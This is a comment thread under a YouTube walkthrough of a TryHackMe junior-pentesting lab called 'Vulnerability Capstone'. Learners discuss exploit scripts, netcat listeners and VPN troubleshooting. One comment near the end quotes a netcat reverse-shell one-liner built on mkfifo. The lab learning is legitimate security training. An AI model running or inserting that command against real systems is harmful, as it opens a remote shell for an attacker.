Try Hack Me : Vulnerability Capstone
Вставка
- Опубліковано 31 січ 2022
- This is our continuation series of Junior pentesting learning path on tryhackme.com. We are done with vulnerabilities! Lets have some fun!
Patreon to help support the channel! Thank you so much!
/ stuffy24
Hacker Discord
/ discord - Наука та технологія
Dude I was sitting here trying to upload a reverse shell from the admin page and was like "Wait wait... I think I'm going out of bounds from where the room wants me to be"
I hate having to go through a walkthrough, I couldn't handle it myself. But thanks for sharing this. I watched 2 more walkthroughs for the same room and this was the only one that helped me. Again, thank you.
Appreciate it!
You always have the best explanation when I get stuck!
Thank you man! I appreciate that!
Thank you so much for this. I was definitely trying to do too much in my own, and got lost. Lol.
thank you so much for walking through this one and teaching a bit. Sometimes its too easy to just paste the answer in when you find it because you want to get the badges or you think you know the basics or whatever. Im really trying to force myself to walk through each step to get it in my brain and improve, so thanks, this helped a lot.
That's the key!! That's why I try to explain for the few out there actually trying to learn it
Thank you! The Python script from searchsploit didn't work out of the box. I appreciate that you showed the alternate script location. That was a huge help.
Glad it helped!
Hi Stuffy24 ! lifesaver, you saved me again, I agree with you we shouldn't be manipulating the script. If they wanted us to do it they would've said something. You're by far the best teaching these rooms ! I even watched some rooms in Arabic, Hindi, to try to follow but everybody else does confusing things. Thank you again !
Appreciate the kind words. Thanks so much!
@@stuffy24 You are helping me get my degree in cybersecurity ! You have a fan ! 😊
@@Alexi-pj4yb well I appreciate the support! Make sure to hop in the discord for daily tips and more access to directly ask questions and things! Thanks again!
Keep up the good work! I've been just using your videos when needed. However, when I'm all done with the certificate I think I might go back and watch all your videos for a good refresher!
Thank you! I appreciate thar
thank you for explaining things instead of giving us the awnsers like other people do in writups . it helps me learn much more and so i dont get stuck again . legend
Thank you for the support
Excellent video. I like that you explain the python version as that was one of the issues I encountered editing the code.I didn't want to make excuses on this room even though I found it quite difficult. That being said you read my mind in regards to the room not being good. 👍
Thank you!
spending my christmas with my boi Stuffy24
Let's go! Merry Christmas
I realized I was gonna have to edit the code but like damn im glad I just looked it up so messy lol
I started with two different exploit py files, and both worked but one needed the OpenBSD reverse shell payload , and I'm mostly annoyed because I don't know exactly why. That exploit they provided ended up being much cleaner anyways. Thanks again!
I was actuallly editing the code. Thank you for this video it was very helpful.
Really glad it helped
your videos are very helpful mate!! kudos to you CHEERS!!!
Very good videos. Thank you mate
Subbed. Dude i love your videos and you're perfect for my learning style
Thanks so much! I really appreciate that!
Really weird I had to set my listener to port 8082 for some reason 8081 would not work. It kept throwing an air but after 10 minutes of trying the same thing I decided to change something and guess what it worked.😂😂 thank you again this is making a lot more sense with these walkthroughs.
Appreciate it. That is weird lol
You have the best way of explaining things bro! love your channel man keep it going
Thanks so much!
Ended up with your walkthrough after watching several. Keep up the Good Work!
Thank you so much!
great content and explanations! 💯💯💯
Thanks so much!
This was a great walkthrough! I watched someone else's video before and it was so confusing but you explained it well
Thank you!
Really appreciate the video!
Thank you so much!
I looked up a guide because I knew as soon as I started getting errors in the python code I downloaded from git that there was a problem. After fixing and reading a couple of errors I thought "Ain't no way they expected someone off the street to just be able to edit python code like this." I should have read the hint.
you are amazing dude!!!
Thank you! Appreciate the support man!
you are a champ...i loved when you said "super easy"
Appreciate it! Not sure if you mean that sarcastically?
@@stuffy24 Not at all x2
Wow 300 to 11k subs in a year cudos brother!
Thanks my man !
@@stuffy24 congrats bro, great explanation, tnx for that
Thank you for your explanation, i tried 3 of the RCE exploit, and tried to change what the cmd told me where there was error, i ran it with python3 as i didnt know there was a thing call python2 and related stuffs. Thanks so much, this makes me wonder what is python2 and will further look into it soon ;D
They are just different versions of python. Different releases! Thank you
Sad to see this box still sucks.. it needs to be updated since it seems way out of scope for the Jr path
HEY! How are you?! I Love your videos and how you explain things!
Just wanted to ask a small question....I tried this got everything like you did, ran my netcat, however it didnt open a listener for some reason, I tried with sudo, changing ports, ran it a few times and I wasnt able to get a connection.... I checked the syntax, checked that I put in the right IP and everything.....I pinged it, it was working....So Im not so sure what Im doing wrong =].
Please join the discord and throw your questions with screenshots under the questions channel
That script keeps sending back “No result” for me.
You will have to join the discord or Patreon so you can send screenshots and the exact process. It's almost impossible to tell you what's wrong with no context. Our community and myself will try to help for sure though!
Me too.
@@teresarothaar6225 if you wanna throw as much info in the discord as possible it makes it much easier to help with what's going on
@@stuffy24 Done! It turned out that the problem was with me. Instead of giving the shell_me command the AttackBox IP, I was giving it the vulnerable machine's IP. DOH!
@@teresarothaar6225 great catch!
Is anyone else expericing no results with the listener? I have tried this multiple times. Any suggesgtions? any help is gratly appreciated.
Are you connected to the VPN? That's the most common thing I see
@@stuffy24 I was using the wrong VPN.. Thank you
what a stupid room. Ty for guide tho
Not sure I agree but thank you for the kind words
I used the exploit I downloaded from exploit-db and got stuck at system: …. . No matter what I entered that, everything got stuck. As a newbie with little experience, watching several ways to hack this box seems overly complicated. I will use as you and THM suggested, the exploit in the attack box.
I understand feeling overwhelmed but keep at it!
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc listenerIP listenerPort >/tmp/f
They put this in the cmd: shell...and I don't get this whole thing...
Hop in the discord and feel free to throw your questions in. We can cover them in detail and the Livestreams tonight so we can discuss